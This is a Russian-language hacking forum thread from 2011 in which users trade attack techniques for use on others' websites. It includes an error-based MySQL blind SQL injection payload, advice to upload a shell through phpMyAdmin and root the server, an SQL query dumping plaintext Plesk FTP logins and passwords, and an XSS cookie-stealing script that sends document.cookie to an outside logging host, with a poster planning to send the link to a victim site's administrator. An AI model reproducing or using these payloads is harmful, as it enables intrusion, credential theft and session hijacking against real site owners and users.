HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.06.2011, 20:47
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами: 8674045

Репутация: 214


По умолчанию

Цитата:
Сообщение от Sc0rpi0n  
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
https://rdot.org/forum/showpost.php?p=746&postcount=3
 
Ответить с цитированием

  #2  
Старый 29.06.2011, 20:56
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Sc0rpi0n  
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
вот тебе пример запроса:

Цитата:
Сообщение от None  
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+
Цитата:
Сообщение от None  
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+
 
Ответить с цитированием

  #3  
Старый 01.07.2011, 01:31
t0wer
Новичок
Регистрация: 07.02.2008
Сообщений: 13
С нами: 9610168

Репутация: 5
По умолчанию

Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль

Направте в нужном направлении информацией или чем капнуть туда?!
 
Ответить с цитированием

  #4  
Старый 01.07.2011, 01:46
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0wer  
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)

клац

есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
 
Ответить с цитированием

  #5  
Старый 01.07.2011, 02:03
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от t0wer  
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT REPLACE[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/home/httpd/vhosts/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password FROM sys_users

LEFT JOIN accounts on sys_users
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]account_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]id

ORDER BY sys_users
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home ASC[/COLOR][/COLOR
Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
 
Ответить с цитированием

  #6  
Старый 01.07.2011, 17:20
killerben
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами: 9816861

Репутация: 0
По умолчанию

почему когда я ввожу

Цитата:
Сообщение от None  
http://www.jertva.ru/search?q=
То в ифрейме выводит содержимое .js файла ?
 
Ответить с цитированием

  #7  
Старый 01.07.2011, 17:29
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
__________________
 
Ответить с цитированием

  #8  
Старый 01.07.2011, 17:41
killerben
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами: 9816861

Репутация: 0
По умолчанию

Цитата:
Сообщение от +toxa+  
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
Спасибо большое, там работает только iframe.

Получилось так:

Содержимое xss.php

Код:
img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
Теперь когда захожу по адресу, присылает:

Код:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
 
Ответить с цитированием

  #9  
Старый 01.07.2011, 17:53
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

зайди на site.ru , потом в адресной строке напиши

Код:
javascript:document.cookie='test_cookie=31337';
и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
__________________
 
Ответить с цитированием

  #10  
Старый 01.07.2011, 17:56
killerben
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами: 9816861

Репутация: 0
По умолчанию

таким способом присылает куки с моего сайта, а не с сайта жертвы.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.